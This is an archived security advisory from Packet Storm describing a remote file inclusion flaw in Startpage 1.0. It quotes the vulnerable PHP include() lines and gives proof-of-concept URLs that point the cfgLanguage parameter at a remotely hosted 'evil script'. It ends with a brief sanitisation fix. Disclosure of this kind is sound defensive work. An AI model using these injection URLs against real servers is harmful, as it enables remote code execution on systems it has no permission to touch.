exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

startpage10.txt

startpage10.txt
Posted Aug 27, 2006
Authored by Sh3ll | Site sh3ll.ir

Startpage version 1.0 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, file inclusion
SHA-256 | 297fa836ed9dab5ea1bc84319d1c317ea92ef7d0bc5ea53642c82844887561d3

startpage10.txt

Change Mirror Download
--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
--------------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
--------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version : 1.0
Venedor : http://matthijs.draijer.org
Class : Remote File Inclusion
Risk : High
Summary :
Startpage v1.0 Is a Script Which Shows Your Favortie Links.
--------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php
When Used The Variable $cfgLanguage in a include() Function Without Being Declared.
----------------------------------------edit.php--------------------------------------------
...
<?php
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------functions.php---------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------new.php---------------------------------------------
...
<?php
include ("config.php");
include ("functions.php");
include ("PageTop.php");
include ("language_$cfgLanguage.php");
connect_db();
?>
...
----------------------------------------PageBottom.php--------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------PageTop.php-----------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
--------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php
& PageTop.php
--------------------------------------------------------------------------------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close